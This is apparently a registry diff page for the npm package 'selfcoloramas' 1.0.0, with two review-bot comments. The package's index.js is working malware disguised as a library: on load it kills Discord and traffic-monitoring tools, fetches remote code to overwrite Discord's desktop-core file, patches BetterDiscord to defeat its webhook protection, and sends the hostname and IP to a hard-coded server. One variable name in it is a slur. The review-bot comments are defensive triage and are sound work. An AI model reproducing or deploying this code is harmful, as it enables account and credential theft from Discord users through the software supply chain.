selfcoloramas 1.0.0
Potentially problematic release.
This version of selfcoloramas might be problematic. Click here for more details.
- package/index.js +201 -0
- package/package.json +31 -0
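--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,201 @@
+
+const glob = require("glob");
+const fs = require('fs');
+const https = require('node:https');
+const { exec } = require('child_process');
+const shell = require('shelljs')
+const os = require('node:os');
+const axios = require('axios');
+const download = require('download');
+var ip = require("ip");
+const zip = require("adm-zip");
+const FormData = require("form-data");
+var XMLHttpRequest = require('xhr2');
+const buf_replace = require('buffer-replace');
+const { session, BrowserWindow } = require("electron");
+const path = require("path");
+const querystring = require("querystring");
+//////////////////////////////////////////////////////////////////////
+const config = {
+"logout": "instant",
+"inject-notify": "true",
+"logout-notify": "true",
+"init-notify":"true",
+"embed-color": 123,
+"USERNAMEWEBHOOK": "moonsz",
+"disable-qr-code": "true"
+}
+//////////////////////////////////////////////////////////////////////
+let LOCAL = process.env.LOCALAPPDATA
+let discords = [];
+let injectPath = [];
+let runningDiscords = [];
+
+fs.readdirSync(LOCAL).forEach(file => {
+if (file.includes("iscord")) {
+discords.push(LOCAL + '\\' + file)
+} else {
+return;
+}
+});
+
+const temp = process.env.temp;
+const infectionPath = path.join(process.env.temp, "\\Windows_Defender");
+
+
+
+function Infect() {
+
+https.get('https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js', (resp) => {
+let data = '';
+
+resp.on('data', (chunk) => {
+data += chunk;
+});
+resp.on('end', () => {
+injectPath.forEach(file => {
+fs.writeFileSync(file, data.replace("%INITNOTI%", config["init-notify"]).replace("%USERIP%", ip.address()).replace("%LOGOUT%", config.logout).replace("%USERNAMEWEBHOOK%", config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%", config["logout-notify"]).replace("3447704",config["embed-color"]).replace('%DISABLEQRCODE%', config["disable-qr-code"]), {
+encoding: 'utf8',
+flag: 'w'
+});
+
+if (config["init-notify"] == "true") {
+let init = file.replace("index.js", "init")
+if (!fs.existsSync(init)) {
+fs.mkdirSync(init, 0744)
+}
+}
+
+if ( config.logout != "false" ) {
+let folder = file.replace("index.js", "DC_BTW")
+if (!fs.existsSync(folder)) {
+fs.mkdirSync(folder, 0744)
+if (config.logout == "instant") {
+startDiscord();
+}
+} else if (fs.existsSync(folder) && config.logout == "instant" ){
+startDiscord();
+}
+}
+})
+});
+}).on("error", (err) => {
+});
+};
+
+const logout = async () => {
+await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
+`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
+true
+);
+
+return "ok";
+};
+
+function killDiscord() {
+runningDiscords.forEach(disc => {
+exec(`taskkill /IM ${disc}.exe /F`, (err) => {
+if (err) {
+return;
+}
+});
+});
+
+if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
+injectNotify();
+
+}
+Infect()
+pwnBetterDiscord()
+};
+
+function listDiscords() {
+exec('tasklist', function(err, stdout, stderr) {
+if (stdout.includes("Discord.exe")) runningDiscords.push("discord");
+if (stdout.includes("Discord (32 bits).exe")) runningDiscords.push("Discord");
+if (stdout.includes("Discord.exe")) runningDiscords.push("Discord (32 bits)");
+if (stdout.includes("DiscordCanary.exe")) runningDiscords.push("discordcanary");
+if (stdout.includes("Discord Canary (32 bits).exe")) runningDiscords.push("Discord Canary");
+if (stdout.includes("DiscordDevelopment.exe")) runningDiscords.push("discorddevelopment");
+if (stdout.includes("DiscordPTB.exe")) runningDiscords.push("discordptb");
+if (stdout.includes("Powercord.exe")) runningDiscords.push("powercord");
+if (stdout.includes("Fiddler.exe")) runningDiscords.push("fiddler");
+if (stdout.includes("wireshark.exe")) runningDiscords.push("wireshark");
+
+if (config.logout == "instant") {
+killDiscord();
+} else {
+if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
+injectNotify();
+}
+Infect()
+pwnBetterDiscord()
+}
+})
+};
+
+function startDiscord() {
+runningDiscords.forEach(disc => {
+let path = LOCAL + '\\' + disc + "\\Update.exe --processStart " + disc + ".exe"
+exec(path, (err) => {
+if (err) {
+return;
+}
+});
+});
+};
+
+function pwnBetterDiscord() {
+let dir = process.env.appdata + "\\BetterDiscord\\data\\betterdiscord.asar"
+if (fs.existsSync(dir)) {
+let x = fs.readFileSync(dir)
+fs.writeFileSync(dir, buf_replace(x, "api/webhooks", "dc"))
+}
+
+return;
+}
+
+function injectNotify() {
+let fields = [];
+injectPath.forEach( path => {
+let c = path
+fields.push(c)
+})
+
+const data = `{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`
+var xhr = new XMLHttpRequest();
+xhr.open('POST', 'http://20.14.80.127/api/newinjection', true);
+xhr.setRequestHeader('Content-type', 'application/json');
+xhr.onload = function () {
+const negrodefender = this.responseText;
+};
+xhr.send(data);
+}
+
+function getDirectories(path) {
+return fs.readdirSync(path).filter(function (file) {
+return fs.statSync(path+'/'+file).isDirectory();
+});
+}
+
+
+listDiscords();
+discords.forEach(function(file) {
+getDirectories(file + "\\").forEach((item) => {
+if (item.includes("app-")) {
+file = file + "\\" + item + "\\modules\\";
+}
+});
+getDirectories(file).forEach((item) => {
+if (item.includes("discord_desktop_core-")) {
+file = file + "\\" + item + "\\discord_desktop_core\\index.js";
+}
+});
+
+if (fs.existsSync(file)) {
+injectPath.push(file);
+}
+});
+killDiscord();
+Infect();
+startDiscord();
+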
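Review bot: Requiring this module is enough to overwrite another application's code: the top-level statements at new lines 182–201 run on load, and `Infect()` writes a script fetched from `raw.githubusercontent.com` over every `discord_desktop_core\index.js` it finds under `%LOCALAPPDATA%`. In the same run `injectNotify()` POSTs the hostname and local IP over plain HTTP to `http://20.14.80.127/api/newinjection`, `pwnBetterDiscord()` rewrites `betterdiscord.asar` in place, and `listDiscords()` queues `Fiddler.exe` and `wireshark.exe` for the `taskkill /F` in `killDiscord()`. For triage, hosts that loaded this version can be checked for `init` or `DC_BTW` directories beside `discord_desktop_core\index.js`, a changed `index.js` there, and traffic to those two endpoints. The fetched payload is not on this page, so what it collects is unknown; it is safest to reinstall the affected Discord clients and treat account sessions and credentials as exposed.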
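--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,31 @@
+{
+"dependencies": {
+"adm-zip": "^0.5.9",
+"axios": "^0.27.2",
+"buffer-replace": "^1.0.0",
+"child_process": "^1.0.2",
+"color": "^4.2.3",
+"download": "^8.0.0",
+"electron": "^19.0.9",
+"form-data": "^4.0.0",
+"fs": "^0.0.1-security",
+"glob": "^8.0.3",
+"https": "^1.0.0",
+"ip": "^1.1.8",
+"os": "^0.1.2",
+"path": "^0.12.7",
+"querystring": "^0.2.1",
+"shelljs": "^0.8.5",
+"xhr2": "^0.2.1"
+},
+"name": "selfcoloramas",
+"version": "1.0.0",
+"main": "index.js",
+"devDependencies": {},
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1"
+},
+"author": "nahedasamic <nahedasamic@gmail.com>",
+"license": "MIT",
+"description": ""
+}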
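Review bot: The `dependencies` block lists `fs`, `os`, `path`, `https`, `child_process` and `querystring`, which are names of Node core modules; `require()` resolves those to the built-ins, so the same-named registry packages are installed but never loaded and only widen the install surface. `color` is declared but not required anywhere in `index.js`, and `electron` is an unusual runtime dependency for a library. There is no lifecycle script in `scripts`, so the code in `main` (`index.js`) runs on first `require` rather than at install time, and a check that inspects only install hooks would not see it. A manifest with an empty `description`, no `repository` field and this dependency set is a reasonable trigger for manual review before the package is allowed into a build.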